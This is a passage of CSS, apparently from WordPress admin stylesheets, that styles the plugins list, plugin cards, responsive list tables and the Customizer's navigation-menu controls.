1px 0 rgba(0, 0, 0, 0.02), inset 0 -1px 0 #dcdcde; } .plugins .update td, .plugins .update th, .upgrade .plugins tr:last-of-type td, .upgrade .plugins tr:last-of-type th, .plugins tr.active + tr.inactive.update th, .plugins tr.active + tr.inactive.update td, .plugins .updated td, .plugins .updated th, .plugins tr.active + tr.inactive.updated th, .plugins tr.active + tr.inactive.updated td { box-shadow: none; } .plugins .active th.check-column, .plugin-update-tr.active td { border-right: 4px solid var(--wp-admin-theme-color); } .wp-list-table.plugins .plugin-title, .wp-list-table.plugins .theme-title { padding-left: 12px; white-space: nowrap; } .plugins .plugin-title .dashicons, .plugins .plugin-title img.plugin-icon, .plugins .plugin-title img.updates-table-screenshot { float: right; padding: 0 0 0 10px; width: 64px; height: 64px; } .plugins .plugin-title .dashicons:before { padding: 2px; background-color: #f0f0f1; box-shadow: inset 0 0 10px rgba(167, 170, 173, 0.15); font-size: 60px; color: #c3c4c7; } #update-themes-table .plugin-title img.updates-table-screenshot, #update-themes-table .plugin-title .dashicons { width: 85px; } .plugins .column-auto-updates { width: 14.2em; } .plugins .inactive .plugin-title strong { font-weight: 400; } .plugins .second, .plugins .row-actions { padding: 0 0 5px; } .plugins .row-actions { white-space: normal; min-width: 12em; } .plugins .update .second, .plugins .update .row-actions, .plugins .updated .second, .plugins .updated .row-actions { padding-bottom: 0; } .plugins-php .widefat tfoot th, .plugins-php .widefat tfoot td { border-top-style: solid; border-top-width: 1px; } .plugins .plugin-update-tr .plugin-update { box-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.1); overflow: hidden; /* clearfix */ padding: 0; } .plugins .plugin-update-tr .notice, .plugins .plugin-update-tr div[class="update-message"] { /* back-compat for pre-4.6 */ margin: 5px 40px 15px 20px; } .plugins .notice p { margin: 0.5em 0; } .plugins .plugin-description a, .plugins .plugin-update a, .updates-table .plugin-title a { text-decoration: underline; } .plugins tr.paused th.check-column { border-right: 4px solid #b32d2e; } .plugins tr.paused th, .plugins tr.paused td { background-color: #f6f7f7; } .plugins tr.paused .plugin-title, .plugins .paused .dashicons-warning { color: #b32d2e; } .plugins .paused .error-display p, .plugins .paused .error-display code { font-size: 90%; color: rgba(0, 0, 0, 0.7); } .plugins .resume-link { color: #b32d2e; } .plugin-card .update-now:before { color: #d63638; content: "\f463"; content: "\f463" / ''; display: inline-block; font: normal 16px/1.875 dashicons; /* line-height 1.875 = 30px to match button */ margin: 0 -2px 0 5px; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; vertical-align: top; } .plugin-card .updating-message:before { content: "\f463"; content: "\f463" / ''; animation: rotation 2s infinite linear; } @keyframes rotation { 0% { transform: rotate(0deg); } 100% { transform: rotate(-359deg); } } .plugin-card .updated-message:before { color: #68de7c; content: "\f147"; content: "\f147" / ''; } .plugin-card .updated-message:before, .plugin-card .updating-message:before { line-height: 1; position: relative; top: -2px; vertical-align: middle; } .plugin-install-php #the-list { display: flex; flex-wrap: wrap; } .plugin-install-php .plugin-card { display: flex; flex-direction: column; justify-content: space-between; } .plugin-install-php h2 { clear: both; } .plugin-install-php h3 { margin: 2.5em 0 8px; } .plugin-install-php .wp-filter { margin-bottom: 0; } /* Plugin card table view */ .plugin-group { overflow: hidden; /* clearfix */ margin-top: 1.5em; } .plugin-group h3 { margin-top: 0; } .plugin-card { float: right; margin: 0 8px 16px; width: 48.5%; width: calc( 50% - 8px ); background-color: #ffffff; border: 1px solid rgb(0, 0, 0, 0.1); border-radius: 8px; box-sizing: border-box; overflow: hidden; } .plugin-card:nth-child(odd) { clear: both; margin-right: 0; } .plugin-card:nth-child(even) { margin-left: 0; } @media screen and (min-width: 1600px) and ( max-width: 2299px ) { .plugin-card { width: 30%; width: calc( 33.1% - 8px ); } .plugin-card:nth-child(odd) { clear: none; margin-right: 8px; } .plugin-card:nth-child(even) { margin-left: 8px; } .plugin-card:nth-child(3n+1) { clear: both; margin-right: 0; } .plugin-card:nth-child(3n) { margin-left: 0; } } @media screen and (min-width: 2300px) { .plugin-card { width: 25%; width: calc( 25% - 12px ); } .plugin-card:nth-child(odd) { clear: none; margin-right: 8px; } .plugin-card:nth-child(even) { margin-left: 8px; } .plugin-card:nth-child(4n+1) { clear: both; margin-right: 0; } .plugin-card:nth-child(4n) { margin-left: 0; } } .plugin-card-top { position: relative; padding: 16px; min-height: 135px; } div.action-links, .plugin-action-buttons { margin: 0; /* Override existing margins */ } .plugin-card h3 { margin: 0 0 16px 12px; font-size: 18px; line-height: 1.3; } .plugin-card .desc { margin-inline: 0; } .plugin-card .name, .plugin-card .desc > p { margin-right: 148px; } @media (min-width: 1101px) { .plugin-card .name, .plugin-card .desc > p { margin-left: 128px; } } @media (min-width: 481px) and (max-width: 781px) { .plugin-card .name, .plugin-card .desc > p { margin-left: 128px; } } .plugin-card .column-description { display: flex; flex-direction: column; justify-content: flex-start; } .plugin-card .column-description > p { margin-top: 0; } .plugin-card .column-description p:empty { display: none; } .plugin-card .notice.plugin-dependencies { margin: auto 20px 20px; padding: 15px; } .plugin-card .plugin-dependencies-explainer-text { margin-block: 0; } .plugin-card .plugin-dependency { align-items: center; display: flex; flex-wrap: wrap; margin-top: .5em; column-gap: 1%; row-gap: .5em; } .plugin-card .plugin-dependency:nth-child(2), .plugin-card .plugin-dependency:last-child { margin-top: 1em; } .plugin-card .plugin-dependency-name { flex-basis: 74%; } .plugin-card .plugin-dependency .more-details-link { margin-right: auto; } .rtl .plugin-card .plugin-dependency .more-details-link { margin-left: auto; } @media (max-width: 939px) { .plugin-card .plugin-dependency-name { flex-basis: 69%; } } .plugins #the-list .required-by, .plugins #the-list .requires { margin-top: 1em; } .plugin-card .action-links { position: absolute; top: 20px; left: 20px; width: 120px; } .plugin-action-buttons { clear: left; float: left; margin-bottom: 1em; text-align: left; } .plugin-action-buttons li { margin-bottom: 10px; } .plugin-card-bottom { clear: both; padding: 16px; background-color: #f6f7f7; border-top: 1px solid rgb(0, 0, 0, 0.1); overflow: hidden; } .plugin-card-bottom .star-rating { display: inline; } .plugin-card-update-failed .update-now { font-weight: 600; } .plugin-card-update-failed .notice-error { margin: 0; padding-right: 16px; box-shadow: 0 -1px 0 #dcdcde; } .plugin-card-update-failed .plugin-card-bottom { display: none; } .plugin-card .column-rating { line-height: 1.76923076; } .plugin-card .column-rating, .plugin-card .column-updated { margin-bottom: 4px; } .plugin-card .column-rating, .plugin-card .column-downloaded { float: right; clear: right; max-width: 180px; } .plugin-card .column-updated, .plugin-card .column-compatibility { text-align: left; float: left; clear: left; width: 65%; width: calc( 100% - 180px ); } .plugin-card .column-compatibility span:before { font: normal 20px/.5 dashicons; display: inline-block; padding: 0; top: 4px; right: -2px; position: relative; vertical-align: top; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; text-decoration: none !important; color: #3c434a; } .plugin-card .column-compatibility .compatibility-incompatible:before { content: "\f158"; content: "\f158" / ''; color: #d63638; } .plugin-card .column-compatibility .compatibility-compatible:before { content: "\f147"; content: "\f147" / ''; color: #007017; } .plugin-card .notice { margin: 20px 20px 0; } .plugin-card .plugin-icon { position: absolute; top: 20px; right: 20px; width: 128px; height: 128px; margin: 0 0 20px 20px; } .no-plugin-results { color: #646970; /* same as no themes and no media */ font-size: 18px; font-style: normal; margin: 0; padding: 100px 0 0; width: 100%; text-align: center; } /* ms */ /* Background Color for Site Status */ .wp-list-table .site-deleted, .wp-list-table tr.site-deleted, .wp-list-table .site-archived, .wp-list-table tr.site-archived { background: #fcf0f1; } .wp-list-table .site-spammed, .wp-list-table tr.site-spammed, .wp-list-table .site-mature, .wp-list-table tr.site-mature { background: #fcf9e8; } .sites.fixed .column-lastupdated, .sites.fixed .column-registered { width: 20%; } .sites.fixed .column-users { width: 80px; } /* =Media Queries -------------------------------------------------------------- */ @media screen and (max-width: 1100px) and (min-width: 782px), (max-width: 480px) { .plugin-card .action-links { position: static; margin-right: 148px; width: auto; } .plugin-action-buttons { float: none; margin: 1em 0 0; text-align: right; } .plugin-action-buttons li { display: inline-block; vertical-align: middle; } .plugin-action-buttons li .button { margin-left: 20px; } .plugin-card h3 { margin-left: 24px; } .plugin-card .name, .plugin-card .desc { margin-left: 0; } .plugin-card .desc p:first-of-type { margin-top: 0; } } @media screen and (max-width: 782px) { /* WP List Table Options & Filters */ .tablenav { height: auto; } .tablenav.top { margin: 20px 0 5px; } .tablenav.bottom { position: relative; margin-top: 15px; } .tablenav br { display: none; } .tablenav br.clear { display: block; } .tablenav.top .actions, .tablenav .view-switch { display: none; } .view-switch a { width: 36px; height: 36px; line-height: 2.53846153; } /* Pagination */ .tablenav.top .displaying-num { display: none; } .tablenav.bottom .displaying-num { position: absolute; left: 0; top: 11px; margin: 0; font-size: 14px; } .tablenav .tablenav-pages { width: 100%; text-align: center; margin: 0 0 25px; } .tablenav.bottom .tablenav-pages { margin-top: 25px; } .tablenav.top .tablenav-pages.one-page { display: none; } .tablenav.bottom .actions select { margin-bottom: 5px; } .tablenav.bottom .actions.alignleft + .actions.alignleft { clear: right; margin-top: 10px; } .tablenav.bottom .tablenav-pages.one-page { margin-top: 15px; height: 0; } .tablenav-pages .pagination-links { font-size: 16px; } .tablenav .tablenav-pages .button, .tablenav .tablenav-pages .tablenav-pages-navspan { min-width: 40px; min-height: 40px; padding: 10px 8px; font-size: 18px; line-height: 1; } .tablenav-pages .pagination-links .current-page { min-width: 40px; padding: 10px 6px; font-size: 16px; line-height: 1.125; } /* WP List Table Adjustments: General */ .form-wrap > p { display: none; } .wp-list-table th.column-primary ~ th, .wp-list-table tr:not(.inline-edit-row):not(.no-items) td.column-primary ~ td:not(.check-column) { display: none; } .wp-list-table thead th.column-primary { width: 100%; } /* Checkboxes need to show */ .wp-list-table tr th.check-column { display: table-cell; } .wp-list-table .check-column { width: 2.5em; } .wp-list-table .column-primary .toggle-row { display: block; } .wp-list-table tr:not(.inline-edit-row):not(.no-items) td:not(.check-column) { position: relative; clear: both; width: auto !important; /* needs to override some columns that are more specifically targeted */ } .wp-list-table td.column-primary { padding-left: 50px; /* space for toggle button */ } .wp-list-table tr:not(.inline-edit-row):not(.no-items) td.column-primary ~ td:not(.check-column) { padding: 3px 35% 3px 8px; } .wp-list-table tr:not(.inline-edit-row):not(.no-items) td:not(.column-primary)::before { position: absolute; right: 10px; /* match padding of regular table cell */ display: block; overflow: hidden; width: 32%; /* leave a little space for a gutter */ content: attr(data-colname); white-space: nowrap; text-overflow: ellipsis; } .wp-list-table .is-expanded td:not(.hidden) { display: block !important; overflow: hidden; /* clearfix */ } /* Special cases */ .widefat .num, .column-posts { text-align: right; } #comments-form .fixed .column-author, #commentsdiv .fixed .column-author { display: none !important; } .fixed .column-comment .comment-author { display: block; } /* Comment author hidden via Screen Options */ .fixed .column-author.hidden ~ .column-comment .comment-author { display: none; } #the-comment-list .is-expanded td { box-shadow: none; } #the-comment-list .is-expanded td:last-child { box-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.1); } /* Show comment bubble as text instead */ .post-com-count .screen-reader-text { position: static; clip-path: none; width: auto; height: auto; margin: 0; } .column-response .post-com-count-no-comments:after, .column-response .post-com-count-approved:after, .column-comments .post-com-count-no-comments:after, .column-comments .post-com-count-approved:after { content: none; } .column-response .post-com-count [aria-hidden="true"], .column-comments .post-com-count [aria-hidden="true"] { display: none; } .column-response .post-com-count-wrapper, .column-comments .post-com-count-wrapper { white-space: normal; } .column-response .post-com-count-wrapper > a, .column-comments .post-com-count-wrapper > a { display: block; } .column-response .post-com-count-no-comments, .column-response .post-com-count-approved, .column-comments .post-com-count-no-comments, .column-comments .post-com-count-approved { margin-top: 0; margin-left: 0.5em; } .column-response .post-com-count-pending, .column-comments .post-com-count-pending { position: static; height: auto; min-width: 0; padding: 0; border: none; border-radius: 0; background: none; color: #b32d2e; font-size: inherit; line-height: inherit; text-align: right; } .column-response .post-com-count-pending:hover, .column-comments .post-com-count-pending:hover { color: #d63638; } .widefat thead td.check-column, .widefat tfoot td.check-column { padding-top: 10px; } .row-actions { margin-left: -8px; padding-top: 4px; } /* Make row actions more easy to select on mobile */ body:not(.plugins-php) .row-actions { display: flex; flex-wrap: wrap; gap: 8px; color: transparent; } .row-actions span { font-size: 0; } .row-actions span a, .row-actions span .button-link { display: inline-block; padding: 4px 0 4px 16px; font-size: 13px; line-height: 1.5; } .row-actions span.approve:before, .row-actions span.unapprove:before { content: "| "; } /* Quick Edit and Bulk Edit */ #wpbody-content .quick-edit-row-post .inline-edit-col-left, #wpbody-content .quick-edit-row-post .inline-edit-col-right, #wpbody-content .inline-edit-row-post .inline-edit-col-center, #wpbody-content .quick-edit-row-page .inline-edit-col-left, #wpbody-content .quick-edit-row-page .inline-edit-col-right, #wpbody-content .bulk-edit-row-post .inline-edit-col-right, #wpbody-content .bulk-edit-row .inline-edit-col-left, #wpbody-content .bulk-edit-row-page .inline-edit-col-right, #wpbody-content .bulk-edit-row .inline-edit-col-bottom { float: none; width: 100%; padding: 0; } #the-list .inline-edit-row .inline-edit-legend, .inline-edit-row span.title { font-size: 16px; } .inline-edit-row p.howto { font-size: 14px; } #wpbody-content .inline-edit-row-page .inline-edit-col-right { margin-top: 0; } #wpbody-content .quick-edit-row fieldset .inline-edit-col label, #wpbody-content .quick-edit-row fieldset .inline-edit-group label, #wpbody-content .bulk-edit-row fieldset .inline-edit-col label, #wpbody-content .bulk-edit-row fieldset .inline-edit-group label { max-width: none; float: none; margin-bottom: 5px; } #wpbody .bulk-edit-row fieldset select { display: block; width: 100%; max-width: none; box-sizing: border-box; } .inline-edit-row select, .inline-edit-row input:where(:not([type=checkbox],[type=radio],[type=submit],[type=button])) { min-height: 40px; } .inline-edit-row fieldset input[name=jj], .inline-edit-row fieldset input[name=hh], .inline-edit-row fieldset input[name=mn], .inline-edit-row fieldset input[name=aa] { font-size: 16px; line-height: 2; padding: 3px 4px; } #bulk-titles .ntdelbutton, #bulk-titles .ntdeltitle, .inline-edit-row fieldset ul.cat-checklist label { padding: 6px 0; font-size: 16px; line-height: 28px; } #bulk-titles .ntdelitem { padding-right: 37px; } #bulk-titles .ntdelbutton { width: 40px; height: 40px; margin: 0 -40px 0 0; overflow: hidden; } #bulk-titles .ntdelbutton:before { font-size: 20px; line-height: 28px; } .inline-edit-row fieldset label span.title, .inline-edit-row fieldset.inline-edit-date legend { float: none; } .inline-edit-row fieldset .inline-edit-col label.inline-edit-tags { padding: 0; } .inline-edit-row fieldset label span.input-text-wrap, .inline-edit-row fieldset .timestamp-wrap { margin-right: 0; } .inline-edit-row .inline-edit-or { margin: 0 0 0 6px; } #edithead .inside, #commentsdiv #edithead .inside { float: none; text-align: right; padding: 3px 5px; } #commentsdiv #edithead .inside input, #edithead .inside input { width: 100%; } #edithead label { display: block; } /* Updates */ #wpbody-content .updates-table .plugin-title { width: auto; white-space: normal; } /* Links */ .link-manager-php #posts-filter { margin-top: 25px; } .link-manager-php .tablenav.bottom { overflow: hidden; } /* List tables that don't toggle rows */ .comments-box .toggle-row, .wp-list-table.plugins .toggle-row { display: none; } /* Plugin/Theme Management */ #wpbody-content .wp-list-table.plugins td { display: block; width: auto; padding: 10px 9px; /* reset from other list tables that have a label at this width */ } #wpbody-content .wp-list-table.plugins .plugin-deleted-tr td, #wpbody-content .wp-list-table.plugins .no-items td { display: table-cell; } /* Plugin description hidden via Screen Options */ #wpbody-content .wp-list-table.plugins .desc.hidden { display: none; } #wpbody-content .wp-list-table.plugins .column-description { padding-top: 2px; } #wpbody-content .wp-list-table.plugins .plugin-title, #wpbody-content .wp-list-table.plugins .theme-title { padding-left: 12px; white-space: normal; } .wp-list-table.plugins .plugin-title, .wp-list-table.plugins .theme-title { padding-top: 13px; padding-bottom: 4px; } .plugins #the-list tr > td:not(:last-child), .plugins #the-list .update th, .plugins #the-list .update td, .wp-list-table.plugins #the-list .theme-title { box-shadow: none; border-top: none; } .plugins #the-list tr td { border-top: none; } .plugins tbody { padding: 1px 0 0; } .plugins tr.active + tr.inactive th.check-column, .plugins tr.active + tr.inactive td.column-description, .plugins .plugin-update-tr:before { box-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.1); } .plugins tr.active + tr.inactive th.check-column, .plugins tr.active + tr.inactive td { border-top: none; } /* mimic the checkbox th */ .plugins .plugin-update-tr:before { content: ""; display: table-cell; } .plugins #the-list .plugin-update-tr .plugin-update { border-right: none; } .plugin-update-tr .update-message { margin-right: 0; } .plugins .active.update + .plugin-update-tr:before, .plugins .active.updated + .plugin-update-tr:before { background-color: rgba(var(--wp-admin-theme-color--rgb), 0.08); border-right: 4px solid var(--wp-admin-theme-color); } .plugins .plugin-update-tr .update-message { margin-right: 0; } .wp-list-table.plugins .plugin-title strong, .wp-list-table.plugins .theme-title strong { font-size: 1.4em; line-height: 1.5; } .plugins tbody th.check-column { padding: 8px 5px 0 0; } .plugins thead td.check-column, .plugins tfoot td.check-column, .plugins .inactive th.check-column { padding-right: 9px; } /* Add New plugins page */ table.plugin-install .column-name, table.plugin-install .column-version, table.plugin-install .column-rating, table.plugin-install .column-description { display: block; width: auto; } table.plugin-install th.column-name, table.plugin-install th.column-version, table.plugin-install th.column-rating, table.plugin-install th.column-description { display: none; } table.plugin-install td.column-name strong { font-size: 1.4em; line-height: 1.6em; } table.plugin-install #the-list td { box-shadow: none; } table.plugin-install #the-list tr { display: block; box-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.1); } .plugin-card { margin-right: 0; margin-left: 0; width: 100%; } table.media .column-title .has-media-icon ~ .row-actions { margin-right: 0; clear: both; } } @media screen and (max-width: 480px) { .tablenav-pages .current-page { margin: 0; } .tablenav.bottom .displaying-num { position: relative; top: 0; display: block; text-align: left; padding-bottom: 0.5em; } .tablenav.bottom .tablenav-pages.one-page { height: auto; } .tablenav-pages .tablenav-paging-text { float: right; width: 100%; padding-top: 0.5em; } } #customize-theme-controls #accordion-section-menu_locations { position: relative; margin-top: 30px; } #customize-theme-controls #accordion-section-menu_locations > .accordion-section-title { border-bottom-color: #dcdcde; margin-top: 15px; } #customize-theme-controls .customize-section-title-nav_menus-heading, #customize-theme-controls .customize-section-title-menu_locations-heading, #customize-theme-controls .customize-section-title-menu_locations-description { padding: 0 12px; } #customize-theme-controls .customize-control-description.customize-section-title-menu_locations-description { /* Override the default italic style for control descriptions */ font-style: normal; } .menu-in-location, .menu-in-locations { display: block; font-weight: 600; font-size: 10px; } #customize-controls .theme-location-set, #customize-controls .control-section .accordion-section-title:focus .menu-in-location, #customize-controls .control-section .accordion-section-title:hover .menu-in-location { color: #50575e; } /* The `edit-menu` and `create-menu` buttons also use the `button-link` class. */ .customize-control-nav_menu_location .edit-menu, .customize-control-nav_menu_location .create-menu { margin-left: 6px; vertical-align: middle; line-height: 2.2; } #customize-controls .customize-control-nav_menu_name { margin-bottom: 12px; } .customize-control-nav_menu_name p:last-of-type { margin-bottom: 0; } #customize-new-menu-submit { float: right; min-width: 85px; } .wp-customizer .menu-item-bar .menu-item-handle, .wp-customizer .menu-item-settings, .wp-customizer .menu-item-settings .description-thin { box-sizing: border-box; } .wp-customizer .menu-item-bar { margin: 0; } .wp-customizer .menu-item-bar .menu-item-handle { width: 100%; max-width: 100%; background: #fff; } .wp-customizer .menu-item-handle .item-title { margin-right: 0; } .wp-customizer .menu-item-handle .item-type { padding: 1px 21px 0 5px; float: right; text-align: right; } .wp-customizer .menu-item-handle:hover { z-index: 8; } .customize-control-nav_menu_item.has-notifications .menu-item-handle { border-left: 4px solid #72aee6; } .wp-customizer .menu-item-settings { max-width: 100%; overflow: hidden; z-index: 8; padding: 10px; background: #f0f0f1; border: 1px solid #8c8f94; border-top: none; } .wp-customizer .menu-item-settings .description-thin { width: 100%; height: auto; margin: 0 0 8px; } .wp-customizer .menu-item-settings input[type="text"] { width: 100%; } .wp-customizer .menu-item-settings .submitbox { margin: 0; padding: 0; } .wp-customizer .menu-item-settings .link-to-original { padding: 5px 0; border: none; font-style: normal; margin: 0; width: 100%; } .wp-customizer .menu-item .submitbox .submitdelete { float: left; margin: 6px 0 0; padding: 0; cursor: pointer; } /** * Menu items reordering styles */ .menu-item-reorder-nav { display: none; background-color: #fff; position: absolute; top: 0; right: 0; } .menus-move-left:before { content: "\f341"; content: "\f341" / ''; } .menus-move-right:before { content: "\f345"; content: "\f345" / ''; } .reordering .menu-item .item-controls, .reordering .menu-item .item-type { display: none; } .reordering .menu-item-reorder-nav { display: block; } .customize-control input.menu-name-field { width: 100%; /* Override the 98% default for customizer inputs, to align with the size of menu items. */ } .wp-customizer .menu-item .item-edit { position: absolute; right: -19px; top: 2px; display: block; width: 30px; height: 38px; margin-right: 0 !important; box-shadow: none; outline: none; overflow: hidden; cursor: pointer; text-align: center; } .wp-customizer .menu-item.menu-item-edit-active .item-edit .toggle-indicator:before { content: "\f142"; content: "\f142" / ''; } .wp-customizer .menu-item-settings p.description { font-style: normal; } .wp-customizer .menu-settings dl { margin: 12px 0 0; padding: 0; } .wp-customizer .menu-settings .checkbox-input { margin-top: 8px; } .wp-customizer .menu-settings .menu-theme-locations { border-top: 1px solid #c3c4c7; } .wp-customizer .menu-settings { margin-top: 36px; border-top: none; } .wp-customizer .menu-location-settings { margin-top: 12px; border-top: none; } .wp-customizer .control-section-nav_menu .menu-location-settings { margin-top: 24px; border-top: 1px solid #dcdcde; } .wp-customizer .control-section-nav_menu .menu-location-settings, .customize-control-nav_menu_auto_add { padding-top: 12px; } .menu-location-settings .customize-control-checkbox .theme-location-set { line-height: 1; } .customize-control-nav_menu_auto_add label { vertical-align: top; } .menu-location-settings .new-menu-locations-widget-note { display: block; } .customize-control-menu { margin-top: 4px; } #customize-controls .customize-info.open.active-menu-screen-options .customize-help-toggle { color: #50575e; } /* Screen Options */ .customize-screen-options-toggle { background: none; border: none; color: #50575e; cursor: pointer; margin: 0; padding: 20px; position: absolute; right: 0; top: 30px; } #customize-controls .customize-info .customize-help-toggle { padding: 20px; } #customize-controls .customize-info .customize-help-toggle:before { padding: 4px; } .customize-screen-options-toggle:hover, .customize-screen-options-toggle:active, .customize-screen-options-toggle:focus, .active-menu-screen-options .customize-screen-options-toggle, #customize-controls .customize-info.open.active-menu-screen-options .customize-help-toggle:hover, #customize-controls .customize-info.open.active-menu-screen-options .customize-help-toggle:active, #customize-controls .customize-info.open.active-menu-screen-options .customize-help-toggle:focus { color: var(--wp-admin-theme-color); } .customize-screen-options-toggle:focus, #customize-controls .customize-info .customize-help-toggle:focus { /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; } .customize-screen-options-toggle:before { -moz-osx-font-smoothing: grayscale; border: none; content: "\f111"; content: "\f111" / ''; display: block; font: 18px/1 dashicons; padding: 5px; text-align: center; text-decoration: none !important; text-indent: 0; left: 6px; position: absolute; top: 6px; } .customize-screen-options-toggle:focus:before, #customize-controls .customize-info .customize-help-toggle:focus:before { border-radius: 100%; } .wp-customizer #screen-options-wrap { display: none; background: #fff; border-top: 1px solid #dcdcde; padding: 4px 15px 15px; } .wp-customizer .metabox-prefs label { display: block; padding-right: 0; line-height: 30px; } /* rework the arrow indicator implementation for NVDA bug same as #32715 */ .wp-customizer .toggle-indicator { display: inline-block; font-size: 20px; line-height: 1; } .rtl .wp-customizer .toggle-indicator { text-indent: 1px; /* account for the dashicon alignment */ } .wp-customizer .menu-item .item-edit .toggle-indicator:before, #available-menu-items .accordion-section-title .toggle-indicator:before { content: "\f140"; content: "\f140" / ''; display: block; padding: 1px 2px 1px 0; border-radius: 50%; color: #787c82; font: normal 20px/1 dashicons; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; text-decoration: none !important; } .control-section-nav_menu .field-link-target, .control-section-nav_menu .field-title-attribute, .control-section-nav_menu .field-css-classes, .control-section-nav_menu .field-xfn, .control-section-nav_menu .field-description { display: none; } .control-section-nav_menu.field-link-target-active .field-link-target, .control-section-nav_menu.field-title-attribute-active .field-title-attribute, .control-section-nav_menu.field-css-classes-active .field-css-classes, .control-section-nav_menu.field-xfn-active .field-xfn, .control-section-nav_menu.field-description-active .field-description { display: block; } /* WARNING: The 20px factor is hard-coded in JS. */ .menu-item-depth-0 { margin-left: 0; } .menu-item-depth-1 { margin-left: 20px; } .menu-item-depth-2 { margin-left: 40px; } .menu-item-depth-3 { margin-left: 60px; } .menu-item-depth-4 { margin-left: 80px; } .menu-item-depth-5 { margin-left: 100px; } .menu-item-depth-6 { margin-left: 120px; } .menu-item-depth-7 { margin-left: 140px; } .menu-item-depth-8 { margin-left: 160px; } /* Not likely to be used or useful beyond this depth */ .menu-item-depth-9 { margin-left: 180px; } .menu-item-depth-10 { margin-left: 200px; } .menu-item-depth-11 { margin-left: 220px; } /* @todo handle .menu-item-settings width */ .menu-item-depth-0 > .menu-item-bar { margin-right: 0; } .menu-item-depth-1 > .menu-item-bar { margin-right: 20px; } .menu-item-depth-2 > .menu-item-bar { margin-right: 40px; } .menu-item-depth-3 > .menu-item-bar { margin-right: 60px; } .menu-item-depth-4 > .menu-item-bar { margin-right: 80px; } .menu-item-depth-5 > .menu-item-bar { margin-right: 100px; } .menu-item-depth-6 > .menu-item-bar { margin-right: 120px; } .menu-item-depth-7 > .menu-item-bar { margin-right: 140px; } .menu-item-depth-8 > .menu-item-bar { margin-right: 160px; } .menu-item-depth-9 > .menu-item-bar { margin-right: 180px; } .menu-item-depth-10 > .menu-item-bar { margin-right: 200px; } .menu-item-depth-11 > .menu-item-bar { margin-right: 220px; } /* Submenu left margin. */ .menu-item-depth-0 .menu-item-transport { margin-left: 0; } .menu-item-depth-1 .menu-item-transport { margin-left: -20px; } .menu-item-depth-3 .menu-item-transport { margin-left: -60px; } .menu-item-depth-4 .menu-item-transport { margin-left: -80px; } .menu-item-depth-2 .menu-item-transport { margin-left: -40px; } .menu-item-depth-5 .menu-item-transport { margin-left: -100px; } .menu-item-depth-6 .menu-item-transport { margin-left: -120px; } .menu-item-depth-7 .menu-item-transport { margin-left: -140px; } .menu-item-depth-8 .menu-item-transport { margin-left: -160px; } .menu-item-depth-9 .menu-item-transport { margin-left: -180px; } .menu-item-depth-10 .menu-item-transport { margin-left: -200px; } .menu-item-depth-11 .menu-item-transport { margin-left: -220px; } /* WARNING: The 20px factor is hard-coded in JS. */ .reordering .menu-item-depth-0 { margin-left: 0; } .reordering .menu-item-depth-1 { margin-left: 15px; } .reordering .menu-item-depth-2 { margin-left: 30px; } .reordering .menu-item-depth-3 { margin-left: 45px; } .reordering .menu-item-depth-4 { margin-left: 60px; } .reordering .menu-item-depth-5 { margin-left: 75px; } .reordering .menu-item-depth-6 { margin-left: 90px; } .reordering .menu-item-depth-7 { margin-left: 105px; } .reordering .menu-item-depth-8 { margin-left: 120px; } /* Not likely to be used or useful beyond this depth */ .reordering .menu-item-depth-9 { margin-left: 135px; } .reordering .menu-item-depth-10 { margin-left: 150px; } .reordering .menu-item-depth-11 { margin-left: 165px; } .reordering .menu-item-depth-0 > .menu-item-bar { margin-right: 0; } .reordering .menu-item-depth-1 > .menu-item-bar { margin-right: 15px; } .reordering .menu-item-depth-2 > .menu-item-bar { margin-right: 30px; } .reordering .menu-item-depth-3 > .menu-item-bar { margin-right: 45px; } .reordering .menu-item-depth-4 > .menu-item-bar { margin-right: 60px; } .reordering .menu-item-depth-5 > .menu-item-bar { margin-right: 75px; } .reordering .menu-item-depth-6 > .menu-item-bar { margin-right: 90px; } .reordering .menu-item-depth-7 > .menu-item-bar { margin-right: 105px; } .reordering .menu-item-depth-8 > .menu-item-bar { margin-right: 120px; } .reordering .menu-item-depth-9 > .menu-item-bar { margin-right: 135px; } .reordering .menu-item-depth-10 > .menu-item-bar { margin-right: 150px; } .reordering .menu-item-depth-11 > .menu-item-bar { margin-right: 165px; } .control-section-nav_menu.menu .menu-item-edit-active { margin-left: 0; } .control-section-nav_menu.menu .menu-item-edit-active .menu-item-bar { margin-right: 0; } .control-section-nav_menu.menu .sortable-placeholder { margin-top: 0; margin-bottom: 1px; max-width: calc(100% - 2px); float: left; display: list-item; border-color: #a7aaad; } .menu-item-transport li.customize-control { float: none; } .control-section-nav_menu.menu ul.menu-item-transport .menu-item-bar { margin-top: 0; } /** * Add-menu-items mode */ .adding-menu-items .control-section { opacity: .4; } .adding-menu-items .control-panel.control-section, .adding-menu-items .control-section.open { opacity: 1; } .menu-item-bar .item-delete { color: #d63638; position: absolute; top: 2px; right: -19px; width: 30px; height: 38px; cursor: pointer; display: none; } .menu-item-bar .item-delete:before { content: "\f335"; content: "\f335" / ''; position: absolute; top: 9px; left: 5px; border-radius: 50%; font: normal 20px/1 dashicons; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } .menu-item-bar .item-delete:hover, .menu-item-bar .item-delete:focus { box-shadow: none; outline: none; color: #d63638; } .adding-menu-items .menu-item-bar .item-edit { display: none; } .adding-menu-items .menu-item-bar .item-delete { display: block; } /** * Styles for menu-item addition panel */ #available-menu-items.opening { overflow-y: hidden; /* avoid scrollbar jitter with animating heights */ } #available-menu-items #available-menu-items-search.open { height: 100%; border-bottom: none; } #available-menu-items .accordion-section-title { border-left: none; border-right: none; background: #fff; transition: background-color 0.15s; /* Reset the value inherited from the base .accordion-section-title style. Ticket #37589. */ -webkit-user-select: auto; user-select: auto; } #available-menu-items .open .accordion-section-title, #available-menu-items #available-menu-items-search .accordion-section-title { background: #f0f0f1; } /* rework the arrow indicator implementation for NVDA bug see #32715 */ #available-menu-items .accordion-section-title:after { content: none !important; } #available-menu-items .accordion-section-title:hover .toggle-indicator:before, #available-menu-items .button-link:hover .toggle-indicator:before, #available-menu-items .button-link:focus .toggle-indicator:before { color: #1d2327; } #available-menu-items .open .accordion-section-title .toggle-indicator:before { content: "\f142"; color: #1d2327; } #available-menu-items 